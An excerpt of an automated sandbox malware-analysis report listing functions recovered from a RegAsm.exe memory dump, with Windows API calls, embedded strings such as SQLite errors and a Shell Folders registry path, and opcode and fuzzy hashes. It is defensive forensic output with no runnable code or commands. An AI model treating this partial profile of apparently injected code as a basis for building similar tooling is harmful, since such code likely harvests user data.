                                                                                                                          • Instruction Fuzzy Hash: F501C8F2E402197BD720AA559C41FEAB6ACEF48345F0040B7B608B3151D6389F494B99
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$_snwprintfmemset
                                                                                                                          • String ID: %2.2X
                                                                                                                          • API String ID: 2521778956-791839006
                                                                                                                          • Opcode ID: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                          • Instruction ID: 672bbb69153a15f1984629f72f86def8939f314c78adde6f8276b735d3b02408
                                                                                                                          • Opcode Fuzzy Hash: fbe0b2ef567fee9eabd5ce406f53818797bf0b783fcface126c98386edfee971
                                                                                                                          • Instruction Fuzzy Hash: 2101D472A403297AF7206756AC46BBA33ACAB41714F11407BFC14AA1C2EA7C9A54469A
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: _snwprintfwcscpy
                                                                                                                          • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                          • API String ID: 999028693-502967061
                                                                                                                          • Opcode ID: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                          • Instruction ID: 4b5f4d23dee208ad245a1fa3262b8d520e9fbefe09054bf07968a47f6ed58b46
                                                                                                                          • Opcode Fuzzy Hash: 17378f80787d8f3ebe1be11f22ab444215ff95c87d82bd16ffe54226d060cac5
                                                                                                                          • Instruction Fuzzy Hash: 1AE04FB5E8870035E92519A10C03B2A155086A6B5BF740C2BFD0AB11D2E47F955DA40F
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                            • Part of subcall function 00414592: RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                            • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
                                                                                                                          • memset.MSVCRT ref: 0040C439
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                          • _wcsupr.MSVCRT ref: 0040C481
                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                                          • memset.MSVCRT ref: 0040C4D0
                                                                                                                          • RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4131475296-0
                                                                                                                          • Opcode ID: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                          • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                                          • Opcode Fuzzy Hash: eb77d7cad75ccead34f911285e165139a1ce78e2e313fb24f2a05cc2c8735199
                                                                                                                          • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004116FF
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                            • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                            • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                          • API String ID: 2618321458-3614832568
                                                                                                                          • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                          • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                          • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                          • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AttributesFilefreememset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2507021081-0
                                                                                                                          • Opcode ID: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                                                                                                          • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                          • Opcode Fuzzy Hash: ef83091bc29200ae48f83625ef90a1b8166089f0f49cdf46917f98b7e2a69a6f
                                                                                                                          • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                          APIs
                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                          • malloc.MSVCRT ref: 00417524
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                          • free.MSVCRT ref: 00417544
                                                                                                                          • free.MSVCRT ref: 00417562
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4131324427-0
                                                                                                                          • Opcode ID: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                                                                                                          • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                          • Opcode Fuzzy Hash: cfc41928342c7d38ba537b091ccfa7db5b1ec00e42cfc0566f3bf65c10721e95
                                                                                                                          • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                          APIs
                                                                                                                          • GetTempPathW.KERNEL32(000000E6,?), ref: 004181DB
                                                                                                                          • GetTempPathA.KERNEL32(000000E6,?), ref: 00418203
                                                                                                                          • free.MSVCRT ref: 0041822B
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: PathTemp$free
                                                                                                                          • String ID: %s\etilqs_$etilqs_
                                                                                                                          • API String ID: 924794160-1420421710
                                                                                                                          • Opcode ID: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                          • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                          • Opcode Fuzzy Hash: e31a5e2f3bccf906726aba0c544514771292db0e77bc602bd0d0b1ea9681ec6c
                                                                                                                          • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ErrorLastMessage_snwprintf
                                                                                                                          • String ID: Error$Error %d: %s
                                                                                                                          • API String ID: 313946961-1552265934
                                                                                                                          • Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                          • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                                                                                          • Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
                                                                                                                          • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: foreign key constraint failed$new$oid$old
                                                                                                                          • API String ID: 0-1953309616
                                                                                                                          • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                          • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                                                                                          • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                                                                                          • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                                                                                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                                                                                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpy
                                                                                                                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                          • API String ID: 3510742995-272990098
                                                                                                                          • Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                          • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                                                                                          • Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
                                                                                                                          • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0044A6EB
                                                                                                                          • memset.MSVCRT ref: 0044A6FB
                                                                                                                          • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                          • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memcpymemset
                                                                                                                          • String ID: gj
                                                                                                                          • API String ID: 1297977491-4203073231
                                                                                                                          • Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                          • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                                                                                          • Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
                                                                                                                          • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E961
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E974
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000001,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E987
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000), ref: 0040E99A
                                                                                                                          • free.MSVCRT ref: 0040E9D3
                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@$free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2241099983-0
                                                                                                                          • Opcode ID: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                                                                                                          • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                                                                                          • Opcode Fuzzy Hash: 19095588850990c46bdad328a5ee36c0371ce97c1ec727ecbec68dd44be4216d
                                                                                                                          • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                                                                                          APIs
                                                                                                                          • AreFileApisANSI.KERNEL32 ref: 00417497
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                                                                                          • malloc.MSVCRT ref: 004174BD
                                                                                                                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                                                                                          • free.MSVCRT ref: 004174E4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4053608372-0
                                                                                                                          • Opcode ID: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                                                                                                          • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                                                                                          • Opcode Fuzzy Hash: 08f091da2dc5d23eff2f4744096d44e3be30840942caacf8e9331985bc643402
                                                                                                                          • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                                                                                          APIs
                                                                                                                          • GetParent.USER32(?), ref: 0040D453
                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0040D460
                                                                                                                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                                                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                                                                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientParentPoints
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4247780290-0
                                                                                                                          • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                          • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                                                                                          • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                                                                                          • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                                                                                                          • memset.MSVCRT ref: 004450CD
                                                                                                                            • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                                                                                            • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1471605966-0
                                                                                                                          • Opcode ID: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                          • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                                                                                          • Opcode Fuzzy Hash: e6bd7317cd4251b1e8eae304c5381edf11c17e01417ca171e36e0e10a1f16311
                                                                                                                          • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                                                                                          APIs
                                                                                                                          • wcscpy.MSVCRT ref: 0044475F
                                                                                                                          • wcscat.MSVCRT ref: 0044476E
                                                                                                                          • wcscat.MSVCRT ref: 0044477F
                                                                                                                          • wcscat.MSVCRT ref: 0044478E
                                                                                                                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                                                            • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                                                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                                                                                                                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                                                                                          • String ID: \StringFileInfo\
                                                                                                                          • API String ID: 102104167-2245444037
                                                                                                                          • Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                          • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                                                                                          • Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
                                                                                                                          • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                                                                                          APIs
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8EC
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E8FA
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E90B
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E922
                                                                                                                          • ??3@YAXPAX@Z.MSVCRT(?,?,?,0040EB18), ref: 0040E92B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ??3@
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 613200358-0
                                                                                                                          • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                          • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                                                                                          • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                                                                                          • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 004100FB
                                                                                                                          • memset.MSVCRT ref: 00410112
                                                                                                                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                                                                                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                                                                                          • _snwprintf.MSVCRT ref: 00410141
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: memset$_snwprintf_wcslwrwcscpy
                                                                                                                          • String ID: </%s>
                                                                                                                          • API String ID: 3400436232-259020660
                                                                                                                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                                                                                                                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                                                                                                                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                                                                                                                          APIs
                                                                                                                          • memset.MSVCRT ref: 0040D58D
                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                                                                                                                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ChildEnumTextWindowWindowsmemset
                                                                                                                          • String ID: caption
                                                                                                                          • API String ID: 1523050162-4135340389
                                                                                                                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                                                                                                                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                                                                                                                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                                                                                                                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                                                                                                                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_15_2_400000_RegAsm.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
